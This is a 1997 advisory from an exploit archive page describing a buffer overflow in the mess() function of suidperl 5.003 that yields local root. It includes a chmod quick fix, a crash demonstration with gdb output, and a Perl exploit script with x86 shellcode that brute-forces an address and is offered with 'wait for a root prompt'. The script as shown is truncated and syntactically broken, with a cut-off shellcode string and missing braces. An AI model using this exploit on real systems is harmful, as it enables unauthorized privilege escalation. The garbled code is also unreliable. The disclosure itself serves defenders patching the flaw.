Overflow in suidperl 5.003

Description:Overflow (via sprintf()) in the mess() function in suidperl
Author:Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
Compromise: root (local)
Vulnerable Systems:Thos running suid-perl 5.003, this includes many Linux, *BSD, Solaris and UNIX boxes in general.
Date:13 November 1997

Date: Thu, 13 Nov 1997 18:14:28 +0100
From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
Subject: another buffer overrun in sperl5.003


Any user can gain root privileges on a Intel Linux system with suidperl
5.003 (having the suid bit, of course) even if "SUIDBUF" and "two suidperl
security patches" have been applied. Non-Intel / non-Linux platforms may
be affected as well.

Quick fix:

chmod u-s /usr/bin/sperl5.003  (what else?)


There is a nasty bug in mess() (util.c): it is possible to overflow
its buffer (via sprintf()); mess() tries to detect this situation but
fails to handle the problem properly:

[excerpt from util.c]

    if (s - s_start >= sizeof(buf)) {   /* Ooops! */
        if (usermess)
            fputs(SvPVX(tmpstr), stderr);
            fputs(buf, stderr);
        fputs("panic: message overflow - memory corrupted!\n",stderr);

It does not abort immediately. It prints out an error message and calls
my_exit(1), and this is very bad.

$ perl -v
This is perl, version 5.003 with EMBED
        Locally applied patches:
          SUIDBUF - Buffer overflow fixes for suidperl security

        built under linux at Apr 22 1997 10:04:46
        + two suidperl security patches

$ perl `perl -e "print 'A' x 3000"`
...AAAAAAAAAAAAAAAAA": File name too long
panic: message overflow - memory corrupted!

...AAAAAAAAAAAAAAAAA": File name too long
panic: message overflow - memory corrupted!
Segmentation fault (core dumped)

$ gdb /usr/bin/perl core
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation,
(no debugging symbols found)...
Core was generated by `perl AAAAA...'.
Program terminated with signal 11, Segmentation fault.
Reading symbols ...
#0  0x41414141 in ?? ()

Voila! 0x41414141 == "AAAA"

The variable called top_env has been overwritten. In fact, it is jmp_buf
and Perl calls longjmp() with it somewhere in my_exit().

Run this and wait for a root prompt:

[exploit code]


# yes, this suidperl exploit is in perl, isn't it wonderful? :)

$| = 1;

$shellcode =
  "\x90" x 512 .            # nops
  "\xbc\xf0\xff\xff\xbf" .  # movl $0xbffffff0,%esp
  # "standard shellcode" by Aleph One
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .

# start and end of .data
# adjust this using /proc/*/maps

$databot = 0x080a2000;
$datatop = 0x080ab000;

# trial and error loop

$address = $databot + 4;

while ($address < $datatop) {
  $smash_me =
    $shellcode . ('A' x (2052 - length($shellcode))) .
    (pack("l", $address) x 1000) . ('B' x 1000);
  $pid = fork();
  if (!$pid) {
    exec('/usr/bin/sperl5.003', $smash_me);
  else {
    if ($? == 0) {
      printf("THE MAGIC ADDRESS WAS %08x\n", $address);
  $address += 128;

[end of exploit code]

I have tested this on two Red Hat 4.2 systems running on Intel (with
perl-5.003-8 and -9). I am pretty sure any Intel-like Linux having
sperl5.003 is affected.

Other platforms may be affected too.

Perl 5.004 is NOT VULNERABLE.

--Pavel Kankovsky aka Peak (troja.mff.cuni.cz network administration)

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: